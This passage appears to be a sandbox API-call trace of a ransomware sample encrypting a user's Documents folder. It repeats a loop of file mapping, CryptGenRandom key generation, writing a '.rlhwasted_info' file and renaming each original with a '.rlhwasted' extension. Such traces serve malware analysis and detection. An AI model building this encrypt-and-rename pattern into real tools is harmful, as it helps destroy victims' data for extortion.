dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0189.282] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0189.283] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x1208f [0189.283] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1208f) returned 0xb00000 [0189.283] CloseHandle (hObject=0x124) returned 1 [0189.323] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0189.324] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0189.324] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.324] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0189.325] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0189.325] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.336] SetEndOfFile (hFile=0x10c) returned 1 [0189.503] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0189.503] CloseHandle (hObject=0x10c) returned 1 [0189.505] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0189.505] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f0268 | out: hHeap=0x6b0000) returned 1 [0189.506] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0189.507] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0189.507] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.507] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\3m8ziZ713.docx") returned 76 [0189.507] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6d4580 [0189.507] lstrcpyW (in: lpString1=0x6d4618, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.507] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0189.507] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0189.508] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0189.508] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\3m8ziZ713.docx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\3m8ziz713.docx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0189.509] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0189.510] SetEndOfFile (hFile=0x10c) returned 1 [0189.510] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.510] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.510] lstrcpyW (in: lpString1=0x6d4618, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.510] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\3m8ziZ713.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\3m8ziz713.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\3m8ziZ713.docx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\3m8ziz713.docx.rlhwasted")) returned 1 [0189.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\3m8ziZ713.docx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\3m8ziz713.docx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0189.511] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0189.511] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x53f5 [0189.511] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x53f5) returned 0x6a0000 [0189.511] CloseHandle (hObject=0x124) returned 1 [0189.517] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0189.565] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0189.565] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0189.565] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0189.566] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0189.566] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.576] SetEndOfFile (hFile=0x10c) returned 1 [0189.579] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0189.579] CloseHandle (hObject=0x10c) returned 1 [0189.581] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0189.581] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd50 | out: hHeap=0x6b0000) returned 1 [0189.581] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0189.582] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0189.583] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\Jt_SQ14GS-1JSgWc-.pdf") returned 91 [0189.583] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c0) returned 0x6d4580 [0189.583] lstrcpyW (in: lpString1=0x6d4636, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.583] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0189.583] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0189.584] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0189.584] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\Jt_SQ14GS-1JSgWc-.pdf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\jt_sq14gs-1jsgwc-.pdf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0189.584] WriteFile (in: hFile=0x10c, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0189.586] SetEndOfFile (hFile=0x10c) returned 1 [0189.586] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.586] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0189.586] lstrcpyW (in: lpString1=0x6d4636, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.586] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\Jt_SQ14GS-1JSgWc-.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\jt_sq14gs-1jsgwc-.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\Jt_SQ14GS-1JSgWc-.pdf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\jt_sq14gs-1jsgwc-.pdf.rlhwasted")) returned 1 [0189.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\Jt_SQ14GS-1JSgWc-.pdf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\jt_sq14gs-1jsgwc-.pdf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0189.587] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0189.587] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x6218 [0189.587] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6218) returned 0x6a0000 [0189.588] CloseHandle (hObject=0x104) returned 1 [0189.591] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0189.592] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0189.592] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.592] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0189.593] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0189.593] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.642] SetEndOfFile (hFile=0x10c) returned 1 [0189.721] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0189.721] CloseHandle (hObject=0x10c) returned 1 [0189.727] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0189.727] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fb100 | out: hHeap=0x6b0000) returned 1 [0189.727] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0189.733] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0189.733] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.733] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\pL27.rtf") returned 78 [0189.733] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a6) returned 0x6d4580 [0189.733] lstrcpyW (in: lpString1=0x6d461c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.733] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0189.733] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0189.734] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0189.734] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\pL27.rtf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\pl27.rtf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0189.735] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0189.736] SetEndOfFile (hFile=0x10c) returned 1 [0189.736] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.736] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.736] lstrcpyW (in: lpString1=0x6d461c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.736] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\pL27.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\pl27.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\pL27.rtf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\pl27.rtf.rlhwasted")) returned 1 [0189.738] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\pL27.rtf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\pl27.rtf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0189.738] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0189.738] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x171a9 [0189.739] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x171a9) returned 0xb00000 [0189.739] CloseHandle (hObject=0x104) returned 1 [0189.747] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0189.748] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6fb020 | out: pbBuffer=0x6fb020) returned 1 [0189.748] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.748] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0189.749] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0189.749] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.759] SetEndOfFile (hFile=0x10c) returned 1 [0189.762] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.762] CloseHandle (hObject=0x10c) returned 1 [0189.763] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0189.764] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fe060 | out: hHeap=0x6b0000) returned 1 [0189.764] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0189.765] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0189.765] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.765] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\pr0gzn-JDQAsrrdD.ppt") returned 90 [0189.765] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2be) returned 0x6d4580 [0189.765] lstrcpyW (in: lpString1=0x6d4634, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.765] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0189.765] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0189.766] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0189.766] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\pr0gzn-JDQAsrrdD.ppt.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\pr0gzn-jdqasrrdd.ppt.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0189.803] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0189.804] SetEndOfFile (hFile=0x10c) returned 1 [0189.804] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.804] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.804] lstrcpyW (in: lpString1=0x6d4634, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.804] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\pr0gzn-JDQAsrrdD.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\pr0gzn-jdqasrrdd.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\pr0gzn-JDQAsrrdD.ppt.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\pr0gzn-jdqasrrdd.ppt.rlhwasted")) returned 1 [0189.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\pr0gzn-JDQAsrrdD.ppt.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\pr0gzn-jdqasrrdd.ppt.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0189.805] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0189.805] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xd32d [0189.805] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd32d) returned 0x6a0000 [0189.806] CloseHandle (hObject=0x124) returned 1 [0189.810] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0189.811] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6fb020 | out: pbBuffer=0x6fb020) returned 1 [0189.811] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.811] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0189.812] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0189.812] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.821] SetEndOfFile (hFile=0x10c) returned 1 [0189.823] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.823] CloseHandle (hObject=0x10c) returned 1 [0189.828] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0189.828] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fb310 | out: hHeap=0x6b0000) returned 1 [0189.828] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0189.829] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0189.829] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.829] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\SeVp.pptx") returned 79 [0189.829] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a8) returned 0x6d4580 [0189.829] lstrcpyW (in: lpString1=0x6d461e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.829] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0189.830] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0189.831] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0189.831] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\SeVp.pptx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\sevp.pptx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0189.831] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0189.832] SetEndOfFile (hFile=0x10c) returned 1 [0189.833] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.833] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.833] lstrcpyW (in: lpString1=0x6d461e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.833] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\SeVp.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\sevp.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 